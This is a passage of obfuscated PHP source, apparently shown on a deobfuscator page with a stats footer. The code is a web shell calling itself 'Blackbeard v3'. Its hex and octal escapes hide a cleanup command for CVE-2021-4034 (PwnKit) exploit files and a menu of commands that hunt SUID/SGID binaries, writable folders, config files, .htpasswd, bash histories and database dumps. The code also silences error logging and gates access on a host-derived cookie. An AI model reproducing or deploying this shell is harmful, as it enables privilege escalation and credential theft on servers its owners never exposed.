160\40\x26\46\x20\162\155\40\55\162\146\40\x61\x73\x2e\160\171\40\141\163\x77\56\x70\171\40\145\170\160\x6c\x6f\x69\164\x2e\143\x20\x65\x78\x70\154\x6f\x69\164\40\x4d\x61\x6b\x65\146\x69\154\145\x20\x63\x76\145\55\62\60\62\x31\x2d\x34\x30\63\x34\x2e\143\40\143\x76\x65\x2d\x32\60\x32\61\55\64\60\63\64\x2e\163\x68\40\160\x77\x6e\x6b\151\164\x2e\x63\40\x63\x76\145\x2d\x32\x30\x32\x31\x2d\x34\x30\63\x34\x20\107\103\117\x4e\x56\x5f\120\x41\x54\x48\75\56\40\x70\167\x6e\x6b\x69\x74\56\163\157\40\x70\x77\x6e\153\x69\x74\x20\147\143\x6f\156\166\55\x6d\x6f\144\165\x6c\145\163\x20\160\141\171\154\x6f\141\144\x2e\x73\157","\114\151\163\x74\x20\x64\151\x72"=>"\154\x73\x20\x2d\x6c\150\x61","\x6c\151\x73\164\40\x66\x69\x6c\145\40\141\164\164\x72\151\x62\x75\x74\x65\163\40\157\156\40\x61\x20\114\x69\156\165\170\40\x73\x65\143\x6f\x6e\x64\40\145\170\164\x65\156\x64\145\x64\40\146\x69\x6c\145\x20\x73\x79\x73\164\x65\x6d"=>"\x6c\x73\x61\x74\x74\162\x20\x2d\166\x61","\163\x68\x6f\x77\40\x6f\x70\x65\156\145\x64\x20\160\x6f\162\164\x73"=>"\x6e\x65\x74\163\x74\141\x74\x20\x2d\141\x6e\x20\174\40\147\x72\x65\x70\40\55\151\40\154\x69\x73\164\145\156","\x70\x72\x6f\x63\145\x73\x73\x20\163\164\x61\164\x75\x73"=>"\x70\x73\x20\141\165\170","\x46\151\156\144"=>'',"\146\151\x6e\144\40\x61\x6c\x6c\40\163\165\151\x64\x20\146\151\154\145\x73"=>"\x66\151\156\x64\x20\x2f\x20\x2d\x74\x79\160\x65\x20\146\x20\x2d\x70\x65\162\x6d\x20\55\60\64\x30\x30\x30\40\55\x6c\163","\146\x69\156\x64\40\163\165\x69\x64\40\x66\x69\x6c\x65\x73\40\151\x6e\40\x63\x75\x72\162\x65\156\164\40\x64\x69\x72"=>"\146\x69\156\144\40\56\40\55\164\171\160\x65\40\146\x20\x2d\x70\x65\x72\x6d\x20\x2d\x30\x34\60\60\x30\x20\x2d\x6c\163","\146\151\x6e\x64\x20\141\154\154\40\x73\x67\151\x64\x20\146\x69\x6c\145\x73"=>"\x66\x69\156\144\40\x2f\40\55\x74\x79\x70\145\x20\x66\x20\x2d\160\x65\162\155\x20\55\x30\62\60\x30\x30\40\x2d\154\163","\146\151\x6e\x64\x20\163\147\x69\144\40\146\151\154\x65\163\40\151\x6e\x20\143\165\x72\162\145\156\x74\x20\x64\151\162"=>"\146\151\x6e\144\x20\x2e\x20\55\164\171\160\145\x20\146\40\x2d\x70\145\x72\x6d\40\x2d\x30\x32\60\60\x30\40\x2d\154\x73","\146\x69\x6e\144\x20\x63\157\x6e\x66\151\147\56\151\x6e\143\56\x70\x68\x70\40\x66\151\x6c\x65\163"=>"\146\151\x6e\x64\x20\57\x20\55\x74\171\x70\145\x20\146\x20\x2d\156\x61\155\145\x20\x63\x6f\156\146\151\147\x2e\x69\x6e\143\56\x70\x68\160","\146\x69\x6e\x64\40\143\x6f\156\146\151\147\x2a\x20\146\151\154\x65\x73"=>"\146\x69\x6e\144\x20\57\x20\x2d\x74\171\x70\x65\40\x66\40\55\x6e\141\155\145\40\x22\143\x6f\x6e\x66\151\147\x2a\42","\x66\x69\156\144\40\143\x6f\156\x66\151\x67\52\40\146\151\154\x65\x73\40\x69\x6e\x20\x63\165\162\x72\x65\x6e\x74\x20\x64\151\162"=>"\x66\151\156\144\40\x2e\40\55\x74\171\160\x65\x20\x66\x20\55\x6e\x61\x6d\x65\x20\x22\143\x6f\156\146\x69\x67\52\42","\x66\151\156\x64\x20\x61\154\154\x20\167\x72\151\x74\x61\142\154\145\40\146\157\x6c\x64\145\162\163\40\x61\156\144\40\x66\x69\154\145\163"=>"\146\151\156\144\x20\x2f\x20\x2d\x70\145\x72\155\x20\55\62\40\55\154\163","\146\151\156\x64\x20\x61\154\x6c\40\167\x72\151\164\141\142\154\145\x20\x66\157\154\x64\145\162\x73\40\x61\x6e\144\40\146\x69\154\x65\163\x20\151\156\x20\143\x75\x72\x72\x65\156\164\x20\x64\151\162"=>"\146\x69\x6e\x64\x20\x2e\40\x2d\x70\x65\x72\155\40\55\62\x20\55\154\163","\x66\x69\x6e\144\x20\x61\154\x6c\40\x73\x65\x72\x76\x69\143\x65\56\160\167\144\40\x66\x69\154\x65\x73"=>"\x66\151\156\x64\40\57\x20\55\164\171\x70\145\40\146\40\55\x6e\x61\155\x65\40\163\145\162\166\151\143\x65\x2e\160\167\144","\x66\x69\156\144\x20\163\145\162\x76\151\x63\145\56\160\x77\x64\x20\146\151\x6c\x65\163\40\x69\x6e\40\143\165\162\162\x65\x6e\x74\40\x64\151\162"=>"\x66\x69\x6e\144\x20\x2e\40\x2d\164\171\x70\x65\x20\146\x20\55\x6e\x61\155\x65\40\163\145\162\166\151\x63\x65\56\160\x77\x64","\x66\x69\x6e\x64\40\141\154\154\40\x2e\150\164\x70\141\x73\163\167\144\40\x66\x69\x6c\145\x73"=>"\x66\x69\x6e\x64\40\x2f\x20\x2d\x74\171\x70\145\40\x66\x20\55\x6e\x61\x6d\x65\x20\x2e\150\164\160\141\163\x73\x77\x64","\x66\151\x6e\144\x20\x2e\150\x74\x70\x61\163\x73\167\x64\40\146\x69\x6c\x65\x73\40\151\x6e\40\143\x75\162\x72\145\156\164\x20\x64\151\162"=>"\x66\151\156\144\x20\56\x20\x2d\164\171\x70\145\x20\146\40\55\156\141\x6d\x65\40\x2e\150\164\x70\x61\x73\163\167\x64","\x66\x69\x6e\144\x20\141\154\x6c\x20\x2e\142\141\163\x68\137\150\151\x73\x74\157\x72\x79\x20\146\151\154\x65\163"=>"\146\x69\x6e\144\x20\x2f\40\55\x74\x79\160\x65\x20\146\x20\x2d\156\141\155\x65\x20\56\142\x61\x73\x68\137\x68\x69\x73\x74\157\162\171","\146\151\x6e\x64\40\56\142\x61\x73\x68\x5f\150\151\163\164\157\162\x79\x20\x66\151\x6c\x65\163\40\x69\156\40\143\165\x72\x72\145\156\164\40\x64\x69\162"=>"\146\x69\156\144\40\x2e\x20\x2d\164\171\160\x65\x20\146\40\55\x6e\141\155\x65\x20\x2e\142\141\163\x68\x5f\150\151\x73\164\157\x72\171","\x66\x69\x6e\144\x20\x61\154\154\x20\56\146\x65\x74\x63\150\x6d\141\x69\x6c\x72\x63\x20\146\x69\154\x65\x73"=>"\146\151\156\x64\40\57\40\55\164\x79\x70\145\40\146\x20\x2d\156\x61\155\145\40\x2e\x66\x65\x74\143\150\155\141\151\x6c\162\x63","\146\x69\156\x64\40\56\x66\145\x74\x63\150\155\141\x69\154\x72\143\40\x66\x69\154\145\x73\x20\151\x6e\40\143\x75\x72\162\145\156\164\40\x64\151\x72"=>"\146\151\x6e\x64\x20\x2e\40\x2d\164\x79\160\145\x20\x66\40\x2d\x6e\x61\x6d\x65\x20\56\146\x65\x74\143\150\x6d\x61\x69\x6c\x72\x63","\x4c\157\143\x61\164\x65"=>'',"\x6c\157\143\x61\164\x65\x20\x68\x74\x74\160\144\56\x63\157\x6e\x66\x20\146\x69\x6c\x65\163"=>"\x6c\157\143\141\x74\x65\40\x68\164\164\160\144\56\143\x6f\x6e\146","\154\x6f\143\141\164\x65\x20\166\x68\x6f\163\164\x73\56\x63\x6f\156\x66\40\x66\151\x6c\x65\163"=>"\x6c\x6f\143\x61\x74\x65\40\x76\x68\157\163\164\163\56\x63\157\156\146","\x6c\157\143\x61\x74\x65\x20\x70\x72\157\x66\164\160\x64\x2e\143\157\x6e\146\x20\x66\151\x6c\x65\x73"=>"\x6c\x6f\x63\x61\164\145\40\x70\x72\x6f\x66\164\160\144\56\143\157\156\146","\x6c\157\143\x61\x74\145\40\x70\x73\x79\x62\156\x63\56\143\157\156\x66\40\x66\151\x6c\145\x73"=>"\x6c\157\x63\141\164\x65\40\x70\163\171\x62\x6e\x63\x2e\x63\x6f\156\x66","\154\x6f\143\x61\164\x65\40\155\171\56\143\x6f\x6e\x66\x20\x66\151\x6c\x65\x73"=>"\154\157\143\141\x74\x65\40\x6d\x79\x2e\x63\x6f\156\x66","\x6c\x6f\x63\x61\x74\145\40\x61\x64\x6d\151\x6e\56\x70\150\x70\x20\x66\151\x6c\145\x73"=>"\x6c\157\x63\x61\x74\145\40\141\144\x6d\151\x6e\x2e\x70\150\160","\x6c\x6f\x63\141\x74\145\x20\x63\x66\x67\x2e\160\x68\x70\40\146\151\x6c\145\x73"=>"\x6c\157\x63\141\164\x65\40\x63\x66\x67\x2e\x70\150\x70","\154\x6f\143\x61\x74\145\x20\143\157\156\146\56\160\150\x70\40\146\151\x6c\145\163"=>"\154\x6f\x63\x61\x74\145\x20\143\x6f\156\146\x2e\x70\150\160","\154\x6f\x63\x61\x74\145\40\x63\157\x6e\146\x69\x67\56\144\141\x74\40\146\x69\154\x65\x73"=>"\x6c\157\x63\141\164\145\x20\143\x6f\x6e\x66\151\147\56\x64\x61\x74","\154\x6f\x63\x61\x74\145\x20\143\x6f\156\146\x69\147\56\x70\x68\x70\40\x66\151\x6c\145\163"=>"\154\x6f\x63\141\x74\145\40\x63\x6f\156\x66\151\x67\56\160\x68\x70","\x6c\157\x63\x61\164\145\40\x63\157\x6e\x66\x69\147\56\x69\156\143\x20\x66\x69\x6c\x65\163"=>"\x6c\x6f\x63\x61\164\145\40\x63\157\156\146\151\147\x2e\151\x6e\x63","\x6c\x6f\143\141\164\x65\x20\143\157\156\x66\151\147\x2e\x69\x6e\143\x2e\160\150\x70"=>"\x6c\157\x63\x61\164\x65\40\143\157\x6e\x66\151\x67\x2e\151\156\x63\x2e\160\x68\160","\x6c\x6f\143\141\x74\x65\x20\143\x6f\x6e\146\x69\x67\x2e\x64\x65\x66\141\165\154\164\56\x70\x68\x70\x20\x66\151\154\145\x73"=>"\x6c\157\x63\141\164\145\40\143\x6f\156\x66\151\x67\56\144\145\x66\x61\165\154\x74\56\x70\150\160","\154\157\143\141\x74\x65\40\x63\x6f\x6e\146\151\147\52\40\x66\151\154\x65\x73\40"=>"\x6c\x6f\143\x61\164\145\x20\143\157\156\x66\151\147","\x6c\x6f\143\141\164\x65\40\x2e\x63\157\x6e\146\40\146\151\154\145\x73"=>"\154\x6f\143\x61\x74\x65\40\x27\56\x63\x6f\x6e\146\47","\x6c\x6f\x63\141\164\145\x20\56\x70\x77\x64\x20\x66\151\x6c\145\x73"=>"\154\157\x63\x61\x74\x65\x20\47\x2e\160\x77\x64\47","\x6c\157\143\141\164\x65\40\56\163\161\154\x20\146\x69\x6c\x65\163"=>"\x6c\x6f\x63\141\164\x65\40\x27\x2e\163\161\x6c\x27","\x6c\157\143\141\164\145\40\x2e\150\164\x70\x61\163\x73\x77\x64\40\146\151\154\145\163"=>"\154\x6f\143\141\x74\145\x20\47\x2e\150\164\160\x61\163\x73\x77\144\x27","\154\157\143\x61\x74\145\x20\x2e\x62\141\x73\150\x5f\x68\151\x73\164\157\162\x79\x20\x66\x69\154\145\163"=>"\x6c\157\x63\x61\x74\x65\40\x27\x2e\142\x61\163\x68\137\x68\x69\163\x74\x6f\x72\x79\47","\x6c\x6f\143\x61\x74\x65\x20\56\x6d\x79\163\161\x6c\137\x68\x69\x73\164\157\x72\x79\x20\146\x69\x6c\145\163"=>"\x6c\x6f\143\141\164\x65\x20\47\56\155\x79\x73\161\x6c\x5f\x68\151\x73\x74\157\x72\x79\x27","\154\x6f\x63\141\164\x65\40\56\x66\x65\x74\143\x68\155\x61\x69\154\x72\143\x20\146\151\154\x65\163"=>"\x6c\157\x63\x61\x74\145\40\x27\x2e\146\x65\x74\143\x68\155\141\x69\x6c\162\x63\47","\x6c\157\x63\x61\164\145\x20\x62\x61\143\x6b\165\x70\x20\x66\x69\x6c\x65\163"=>"\x6c\157\x63\141\x74\x65\40\142\x61\143\x6b\x75\x70","\154\x6f\x63\141\164\x65\40\144\x75\x6d\160\40\146\x69\154\x65\x73"=>"\154\x6f\143\141\164\145\40\144\x75\x6d\x70");}goto aeTs4;izs2B:ini_set("\x68\164\x6d\x6c\x5f\x65\x72\x72\157\x72\x73",0);goto fcb9Z;ZktEK:@define("\x56\105\x52\123\111\117\x4e","\x42\154\x61\143\153\142\145\x61\x72\x64\x20\x76\63");goto sgdrg;mL35z:error_reporting(0);goto dMy2L;fcb9Z:ini_set("\x6c\x6f\147\137\x65\162\x72\x6f\162\x73",0);goto c9t3R;Cxc8F:if(!isset($_COOKIE[sha1(md5($_SERVER["\x48\x54\x54\x50\x5f\110\x4f\x53\124"]))."\170"])){prototype(sha1(md5($_SERVER["\x48\124\x54\120\x5f\x48\117\123\x54"]))."\170",$asciifnc4);}goto TJJYv;W2Gtj:session_start();goto ztzEK;TODUM: 

Function Calls

None

Variables

None

Stats

MD5 c28e817b8a2fcf2a092fd8b7841af92c
Eval Count 0
Decode Time 268 ms